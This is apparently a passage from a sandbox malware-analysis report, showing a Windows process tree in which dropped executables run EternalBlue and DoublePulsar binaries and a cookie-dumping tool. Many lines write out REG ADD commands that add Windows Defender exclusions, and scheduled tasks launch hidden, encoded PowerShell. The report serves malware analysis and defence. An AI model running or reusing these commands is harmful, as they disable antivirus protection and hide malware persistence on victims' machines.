                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                16⤵
                                                                                • Executes dropped EXE
                                                                                PID:3352
                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe
                                                                                16⤵
                                                                                • Executes dropped EXE
                                                                                PID:3516
                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                16⤵
                                                                                • Executes dropped EXE
                                                                                PID:8840
                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                16⤵
                                                                                • Executes dropped EXE
                                                                                PID:8928
                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                16⤵
                                                                                • Executes dropped EXE
                                                                                PID:7336
                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                16⤵
                                                                                • Executes dropped EXE
                                                                                PID:3696
                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                16⤵
                                                                                  PID:3848
                                                                                • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                  16⤵
                                                                                    PID:3908
                                                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                    16⤵
                                                                                      PID:4232
                                                                                    • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                      16⤵
                                                                                        PID:2124
                                                                                      • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                        16⤵
                                                                                          PID:3932
                                                                                        • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                          16⤵
                                                                                            PID:4032
                                                                                          • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                            16⤵
                                                                                              PID:2724
                                                                                            • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                              16⤵
                                                                                                PID:2636
                                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
                                                                                                16⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2812
                                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                16⤵
                                                                                                  PID:2900
                                                                                                • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                                  16⤵
                                                                                                    PID:3000
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exe
                                                                                                    16⤵
                                                                                                      PID:2832
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe
                                                                                                      16⤵
                                                                                                        PID:2848
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                        16⤵
                                                                                                          PID:2948
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                                          16⤵
                                                                                                            PID:3532
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                            16⤵
                                                                                                              PID:1972
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                                              16⤵
                                                                                                                PID:1396
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                16⤵
                                                                                                                  PID:1752
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                                                  16⤵
                                                                                                                    PID:1588
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                    16⤵
                                                                                                                      PID:2244
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                                                      16⤵
                                                                                                                        PID:2344
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                        16⤵
                                                                                                                          PID:2232
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                          16⤵
                                                                                                                            PID:2456
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                            16⤵
                                                                                                                              PID:1928
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                                                              16⤵
                                                                                                                                PID:940
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxszsyr2.x3u\setup.exe /S /kr /site_id=754 & exit
                                                                                                                      11⤵
                                                                                                                        PID:7588
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\fxszsyr2.x3u\setup.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\fxszsyr2.x3u\setup.exe /S /kr /site_id=754
                                                                                                                          12⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Enumerates system info in registry
                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                          PID:7624
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                            13⤵
                                                                                                                              PID:7812
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                14⤵
                                                                                                                                  PID:7884
                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                    15⤵
                                                                                                                                      PID:7904
                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                      15⤵
                                                                                                                                        PID:7924
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /CREATE /TN "gZeivHZFw" /SC once /ST 10:27:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                    13⤵
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:8448
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /run /I /tn "gZeivHZFw"
                                                                                                                                    13⤵
                                                                                                                                      PID:8568
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /DELETE /F /TN "gZeivHZFw"
                                                                                                                                      13⤵
                                                                                                                                        PID:8936
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\DEUmVUN.exe\" nh /site_id 754 /S" /V1 /F
                                                                                                                                        13⤵
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:9000
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\hjjgaa.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\hjjgaa.exe" /Verysilent
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Adds Run key to start application
                                                                                                                        PID:2496
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:2528
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4064
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:8856
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          6⤵
                                                                                                                            PID:2392
                                                                                                                • C:\Windows\system32\taskeng.exe
                                                                                                                  taskeng.exe {E075E819-137F-4762-8AAE-E4810080741A} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]
                                                                                                                  1⤵
                                                                                                                    PID:8664
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                      2⤵
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:8752
                                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                        3⤵
                                                                                                                          PID:3500
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                        2⤵
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3548
                                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                          3⤵
                                                                                                                            PID:2600
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\FJYaFgdN\jCXSMNj.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\FJYaFgdN\jCXSMNj.exe U4 /S
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                          PID:7592
                                                                                                                        • C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                          C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:8688
                                                                                                                          • C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                            C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                            PID:5632
                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                        1⤵
                                                                                                                          PID:3568
                                                                                                                        • C:\Windows\windefender.exe
                                                                                                                          C:\Windows\windefender.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:7472
                                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                                          taskeng.exe {A1A3734B-8059-4A6F-8531-2F8749D2FA4B} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                          1⤵
                                                                                                                            PID:3412
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\DEUmVUN.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\DEUmVUN.exe nh /site_id 754 /S
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in System32 directory
                                                                                                                              PID:3508
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /CREATE /TN "gjsdPAFWT" /SC once /ST 09:57:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                3⤵
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:3568
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /run /I /tn "gjsdPAFWT"
                                                                                                                                3⤵
                                                                                                                                  PID:7364
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /DELETE /F /TN "gjsdPAFWT"
                                                                                                                                  3⤵
                                                                                                                                    PID:3168
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:4484
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:32
                                                                                                                                        4⤵
                                                                                                                                          PID:4508
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:4520
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            4⤵
                                                                                                                                              PID:4544
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:4556
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                4⤵
                                                                                                                                                  PID:4644
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4728
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4664
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /C copy nul "C:\Windows\Temp\ZKIEJJPSRIlthXTT\dQBOHfmJ\jCxTUEkzMDiPDGlL.wsf"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4616
                                                                                                                                                    • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                      wscript "C:\Windows\Temp\ZKIEJJPSRIlthXTT\dQBOHfmJ\jCxTUEkzMDiPDGlL.wsf"
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:4600
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4692
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                            PID:4756
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4752
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4780
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4852
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1680
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:4876
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4836
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:4900
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4940
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1812
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:4984
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:5028
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:5452
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:5072
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:5100
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:1632
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
